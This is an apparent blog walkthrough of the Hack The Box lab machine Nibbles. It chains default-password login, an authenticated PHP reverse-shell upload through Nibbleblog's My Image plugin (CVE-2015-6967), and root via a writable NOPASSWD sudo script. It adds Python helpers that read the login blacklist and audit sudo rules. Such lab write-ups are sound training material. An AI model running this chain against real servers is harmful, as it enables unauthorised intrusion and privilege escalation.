Nibbles Walkthrough

Max Register
Aug 7, 2020

This was a pretty fun box and I am excited to share this writeup with you.

As always we start with an Nmap scan, using -sC for default scripts, -sV to enumerate service versions and -p- to cover every TCP port (the "Not shown: 65533 closed ports" line in the output confirms that all 65535 ports were scanned).

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 12:49 EDT
Nmap scan report for 10.10.10.75
Host is up (0.044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds

We don’t get much from this initial scan, only that ports 22 (OpenSSH 7.2p2) and 80 (Apache 2.4.18) are open. Since we see an Apache server running on port 80, let’s pull up the web browser and see what’s hosted.

Nothing much to see on the home page of our Apache server (just a bare ‘Hello World’ message), but let’s run gobuster to enumerate possible directories. We run this command:

gobuster dir -u http://10.10.10.75 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Surprisingly, our results come back with nothing but a /server-status directory that returns 403 Forbidden, as shown:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.75
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/07 12:17:41 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/08/07 12:32:00 Finished
===============================================================

OpenSSH is rarely the way in without valid credentials, and nothing came back on the first gobuster scan, so let’s go back to that ‘Hello World’ page and inspect the source to see if there is anything of interest there.

We see an HTML comment mentioning the /nibbleblog/ directory. If we go to http://10.10.10.75/nibbleblog/ we get the following webpage:

Now we are getting somewhere! Just by clicking around on the links we don’t see any input fields that could give us XSS, or even a login page to brute force. With that in mind, let’s run gobuster again, this time with /nibbleblog/ in the URL:

gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Running this command outputs the following:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/04 13:14:38 Starting gobuster
===============================================================
/content (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/README (Status: 200)
/languages (Status: 301)
===============================================================
2020/08/04 13:29:20 Finished
===============================================================

Now we have some good results! First, let’s check out the /README file.

We get a lot of information here, but the only things that stick out are the Nibbleblog version number and the website the software is downloaded from. Let’s add that to our notes and continue exploring the rest of the enumerated directories. /admin seems like a good next step, so let’s pull that up.

We see that Apache directory listing is enabled, so the application’s files are browsable, and this trend continues throughout the other enumerated directories. After poking around in all of them, I have included some of the highlights below:

  • This file identifies the username “admin” and lets us know that there is a blacklist associated with the logon of that user.
  • Here we see the installed plugins. Plugins are worth noting because they are often maintained and updated less frequently than the core application, so they are a good place to look for a known vulnerability. Keep this in mind for later.

We didn’t find any login portal in plain sight while rummaging through the enumerated directories, so let’s do a Google search for the Nibbleblog setup process and see what we come up with.

We find a ‘howtoforge’ page describing the setup and install of the nibbleblog software, and this shows us where the login page is located:

/admin.php is our login page. If we had not found this page we could have run gobuster again with -x php, which makes it request each wordlist entry with a .php extension as well. We would have known to try PHP because we saw multiple .php files in the directory listings we enumerated.

Let’s go to http://10.10.10.75/nibbleblog/admin.php and see whether the ‘howtoforge’ page pointed us at the right login page.

We do get a login page. Earlier we got the username “admin” from a file in the enumerated directories, but we also saw that there is a blacklist associated with it. To test this blacklist, let’s attempt one login with a wrong password and then check back on that file to see whether our failed attempt was recorded.

We see that our IP, 10.10.14.12, has been added to the list with a fail_count of 1. If not for this blacklist I would run Burp Intruder or Hydra against this login page. But if we did that we would most likely be locked out, and since the blacklist is keyed on the source IP the only way to continue would be to attack from another address. To avoid all of that, let’s keep the lockout in the back of our mind and instead research whether Nibbleblog itself, or any of the plugins we found, have known vulnerabilities.
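Because the directory listing exposes the file that stores the users and the blacklist, we can read our own lockout state before deciding whether to brute force at all. The script below is an added example written for this writeup, not part of the original post or of Nibbleblog: the XML sample is constructed to mirror the layout of Nibbleblog’s content/private/users.xml as I recall it (treat the exact element names as an assumption), and the lockout threshold is a parameter because the page never states Nibbleblog’s limit.

```python
import ipaddress
import xml.etree.ElementTree as ET  # for untrusted XML in real tooling prefer defusedxml
from typing import Dict, List

# Constructed sample: modelled on the layout of Nibbleblog's content/private/users.xml
# (assumed layout; the values are made up to match the walkthrough's one failed login).
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.14.12">
    <date type="integer">1596823200</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
"""


def usernames(xml_text: str) -> List[str]:
    """Return every username declared in the users file."""
    root = ET.fromstring(xml_text)
    return [u.get("username") for u in root.findall("user") if u.get("username")]


def blacklist(xml_text: str) -> Dict[str, int]:
    """Map each blacklisted source IP to its recorded fail_count."""
    root = ET.fromstring(xml_text)
    entries: Dict[str, int] = {}
    for node in root.findall("blacklist"):
        ip = node.get("ip")
        if not ip:
            continue
        # Validate the address; ipaddress raises ValueError on junk.
        ip = str(ipaddress.ip_address(ip))
        entries[ip] = int(node.findtext("fail_count", default="0"))
    return entries


def attempts_left(xml_text: str, my_ip: str, limit: int) -> int:
    """How many more failed logins from my_ip before `limit` is reached.

    `limit` is the lockout threshold, which the walkthrough never states,
    so it is an explicit parameter rather than a hard-coded guess.
    """
    used = blacklist(xml_text).get(str(ipaddress.ip_address(my_ip)), 0)
    return max(limit - used, 0)


if __name__ == "__main__":
    # Offline run on the constructed sample; on the box you would fetch the
    # users.xml file from the exposed content/private directory instead.
    print("users:", usernames(SAMPLE_USERS_XML))
    print("blacklist:", blacklist(SAMPLE_USERS_XML))
    print("attempts left for 10.10.14.12 at limit 5:",
          attempts_left(SAMPLE_USERS_XML, "10.10.14.12", 5))
```

The useful property here is that the lockout mechanism becomes an oracle: the same directory listing that leaks the username also tells the attacker exactly how close each source address is to being blocked, which a correctly deployed application would keep server-side only.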

A simple Google search for “nibbleblog vulnerabilities” yields several CVE entries. All of the ones that lead to code execution require an authenticated admin session, so they need the admin username and password. We already have the username “admin”, so let’s search for a default password. Nothing comes up right away, so let’s just try the name of the box, “nibbles”.

It worked! This further illustrates why passwords that cannot be easily guessed are necessary: the box name, the application name and the site title are the first things anyone will try.

Back to our vulnerabilities: #3 on the list stands out because, as we noted earlier, the My Image plugin is installed. That is the authenticated arbitrary file upload in Nibbleblog 4.0.3 (CVE-2015-6967): the plugin stores whatever is uploaded as image.<extension> under content/private/plugins/my_image/ without checking the file type, so a .php upload becomes image.php in a directory Apache will happily execute from. This seems simple enough. We can use a PHP reverse shell that is included in Kali, found in the following directory:

/usr/share/webshells/laudanum/php

We copy php-reverse-shell.php to our working directory and edit the $ip and $port variables near the top of the file to our own IP and preferred port.

Once that shell is modified let’s navigate to the my_image plugin to upload it. Clicking on configure under the ‘My Image’ plugin brings us here:

Simply upload our shell by clicking browse, and then ‘Save changes’. Ignore the warnings that pop up on screen after the upload; the plugin complains because the file is not a real image, but it is still written to disk. Start a Netcat listener on our chosen port before triggering the shell, then, just as the description of vulnerability #3 states, access the uploaded file directly at: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

We got a shell! Now let’s use some Python magic to upgrade it to an interactive TTY.

The box does not have python, but python3 is installed and spawning a pty with it works. After the pty is up we run stty raw -echo on our local terminal, so that Ctrl-C and other control characters are passed through to the remote shell instead of killing our listener, and so that tab completion and line editing work correctly.

Now for privilege escalation! My go-to after getting a user shell on a Linux box is running sudo -l to see if there are any bad sudo rules that allow us to escalate to a root shell.

nibbler@Nibbles:/$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$

We see that we can run exactly one command as root without a password: the bash script monitor.sh in nibbler’s own home directory. That is the whole problem. A NOPASSWD rule is only as strong as the permissions on the file it points at, and a file under the user’s home is under the user’s control. Let’s look at the home directory and see what that monitor script is doing.

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$

We see the user flag and a personal.zip file. Note that personal/stuff/monitor.sh does not exist yet, so sudo will run whatever we choose to place at that path. Assuming the zip contains the monitor.sh script the rule refers to, let’s unzip it.
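The sudo rule is dangerous not because of what monitor.sh does but because of where it lives. The script below is an added example written for this writeup, not part of the original post: it parses sudo -l output (the sample is the box’s own output from above, embedded as a string) and flags any command target that the current user could change, including the case we have here, where the target file does not exist yet but its nearest existing parent directory is writable. The writability check is injectable so the logic can be exercised without depending on the permissions of whatever machine runs it.

```python
import os
import re
import subprocess
import sys
from typing import Callable, List, NamedTuple

# Constructed copy of the `sudo -l` output shown earlier in this writeup.
SAMPLE_SUDO_L = """Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# One rule line as sudo -l prints it: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

Writable = Callable[[str], bool]


class Rule(NamedTuple):
    runas: str
    tags: List[str]
    cmds: List[str]


def os_writable(path: str) -> bool:
    """Default writability check: ask the kernel on behalf of the current user."""
    return os.access(path, os.W_OK)


def parse_sudo_l(output: str) -> List[Rule]:
    """Extract the rules listed under 'may run the following commands'."""
    rules: List[Rule] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").rstrip(": ").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(Rule(m.group("runas").strip(), tags, cmds))
    return rules


def nearest_existing(path: str) -> str:
    """Walk up from `path` to the first component that exists on disk."""
    p = os.path.abspath(path)
    while not os.path.exists(p):
        parent = os.path.dirname(p)
        if parent == p:  # reached the filesystem root
            break
        p = parent
    return p


def hijackable(path: str, writable: Writable = os_writable) -> bool:
    """True if the user decides what runs at `path`: the file is writable, its
    directory is writable (the file can be replaced), or the file is missing
    and the nearest existing ancestor is writable (the file can be created)."""
    if os.path.exists(path):
        return writable(path) or writable(os.path.dirname(os.path.abspath(path)))
    return writable(nearest_existing(path))


def audit_sudo_l(output: str, writable: Writable = os_writable) -> List[str]:
    """Return one finding per command the user could turn into a root shell."""
    findings: List[str] = []
    for rule in parse_sudo_l(output):
        for cmd in rule.cmds:
            if cmd == "ALL":
                findings.append(f"({rule.runas}) ALL: unrestricted")
                continue
            exe = cmd.split()[0]  # drop fixed arguments, keep the binary/script path
            if hijackable(exe, writable):
                findings.append(f"({rule.runas}) {cmd}: user-controlled path")
    return findings


if __name__ == "__main__":
    # Pipe `sudo -l` output in, or let the script call sudo itself (-n: never prompt);
    # falls back to the embedded sample when neither yields anything.
    text = sys.stdin.read() if not sys.stdin.isatty() else subprocess.run(
        ["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for finding in audit_sudo_l(text or SAMPLE_SUDO_L):
        print(finding)
```

Run on the box this reports the monitor.sh rule as user-controlled even before personal.zip is extracted, because /home/nibbler itself is writable by nibbler. The same check on the defending side is the fix: sudo targets should be root-owned files in root-owned directories, never anything under a user’s home.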

nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
ls
stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$

If we open ‘monitor.sh’ in vi, we can replace its contents with a trivial script that, when run through the sudo rule, gives us a root shell.

##############################################################################
# Tecmint_monitor.sh
#
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/
# If any bug, report us in the link below
#
# Free to use/edit/distribute the code below by giving proper credit to Tecmint.com and Author
#
##############################################################################
#! /bin/bash
# unset any variable which system may be using
# clear the screen
clear
[...]
do
  i)iopt=1;;
  *)echo "Invalid arg";;
done
if [[ ! -z $iopt ]]
{
[...]

This file is a system health monitoring script from Tecmint (only the fragments that survived the vi screen capture are shown above). Its contents are of no use to us, so let’s delete every line, either by pressing ‘dd’ on each line or with :%d to clear the file in one go. Once the file is empty, press ‘i’ for insert mode and type the following two lines:

#!/bin/sh
bash

"monitor.sh" 2L, 15C written
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
#!/bin/sh
bash
nibbler@Nibbles:/home/nibbler/personal/stuff$

Once the file is complete we hit ESC to get back into command mode, then :wq to write and quit vi. We replaced the script with a single command, ‘bash’, which when executed with root privileges drops us straight into a root shell without needing another reverse shell. The file kept its executable bit from the archive, which matters: sudo cannot run a script that is not marked executable.

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff#
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/home/nibbler/personal/stuff#

Success! We have a root shell using nothing but a bad sudo rule: NOPASSWD access to a script that lives in the low-privileged user’s own home directory. Time for a root dance!

Thank you for your time reading this writeup, if you enjoyed it, please let me know!
